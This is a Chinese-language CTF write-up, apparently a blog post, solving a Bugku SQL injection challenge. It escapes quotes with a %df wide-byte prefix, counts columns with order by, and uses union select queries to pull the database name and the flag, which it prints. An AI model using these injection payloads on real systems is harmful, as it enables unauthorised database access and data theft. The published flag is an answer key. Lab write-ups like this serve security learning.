bugku ctf sql注入 (宽字节注入毫无压力)

bugku ctf sql注入 (宽字节注入毫无压力)_第1张图片

看一下这么一道题,分支比较低。

先进去看一下

 

bugku ctf sql注入 (宽字节注入毫无压力)_第2张图片

 

让我们查询 id=1 的 string 字段 

 

那就、先给他加上  ?id=1

bugku ctf sql注入 (宽字节注入毫无压力)_第3张图片

发现还是这个界面 呀

 

那如果换为  id=2   看一下结果

 

bugku ctf sql注入 (宽字节注入毫无压力)_第4张图片

 

下面会 变成  空白的 ~~~~~~

那就只好用 ?id=1   这个了

 

正常注入   

/?id=1'
/?id=1'and 1=1%23
/?id=1'and 1=2%23

bugku ctf sql注入 (宽字节注入毫无压力)_第5张图片

 

发现都没有反应  ,,

只好尝试  宽字节注入 

 

输入

/?id=1%df'

 

bugku ctf sql注入 (宽字节注入毫无压力)_第6张图片

出现错误         那么  应该就是  宽字节注入了

 

验证一下

/?id=1%df' and 1=1%23      时   

正确

 

/?id=1%df' and 1=2%23     时

错误

 

 

确定就是宽字节注入

然后看一下有没有显示位

先查一下有几列

/?id=1%df' order by 2%23   正确

/?id=1%df' order by 3%23   错误       说明有2列

 

 

看显示位

/?id=1%df' order by 2%23

bugku ctf sql注入 (宽字节注入毫无压力)_第7张图片

 

 

正好分别是   id   和   key

 

 

那再查一下 database     

/?id=1%df' and 1=2 union select 1,database()%23

bugku ctf sql注入 (宽字节注入毫无压力)_第8张图片

 

 

发现数据库 名  为    sql5

 

这下就好办了   

题目要求 查询  key表   id=1   的string字段 内容

直接 构造 语句 

/?id=1%df' and 1=2 union select 1, string from sql5.key where id=1%23

 

bugku ctf sql注入 (宽字节注入毫无压力)_第9张图片

发现 flag

54f3320dc261f313ba712eb3f13a1f6d

 

你可能感兴趣的:(bugku,ctf)